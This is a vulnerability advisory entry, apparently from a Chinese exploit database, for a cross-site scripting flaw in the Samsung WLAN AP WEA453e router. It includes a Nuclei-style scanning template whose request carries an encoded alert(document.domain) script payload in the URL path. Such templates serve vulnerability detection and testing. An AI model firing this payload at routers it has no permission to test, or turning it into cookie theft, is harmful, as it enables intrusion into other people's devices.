samsung-wlan-ap-xss: Samsung WLAN AP WEA453e - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: samsung-wlan-ap-xss | POC: 已公开

漏洞描述

Samsung WLAN AP WEA453e router contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.

PoC代码[已公开]

id: samsung-wlan-ap-xss

info:
  name: Samsung WLAN AP WEA453e - Cross-Site Scripting
  author: pikpikcu
  severity: high
  description: Samsung WLAN AP WEA453e router contains a cross-site scripting vulnerability. An attacker can execute arbitrary script and thus steal cookie-based authentication credentials and launch other attacks.
  reference:
    - https://iryl.info/2020/11/27/exploiting-samsung-router-wlan-ap-wea453e/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,samsung,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "/tmp/www/<script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 404

      - type: word
        words:
          - "text/html"
        part: header
# digest: 4a0a00473045022100ce5ed8cb1fecc34140cf025cd26ee9c797d238de0ec90aa9d1255256bad77d310220079eca1928b312fa54d0aecb97d59de0e1ec8ad581dfffb10bea24931c9b4074:922c64590222798bb761d5b6d8e72950

相关漏洞推荐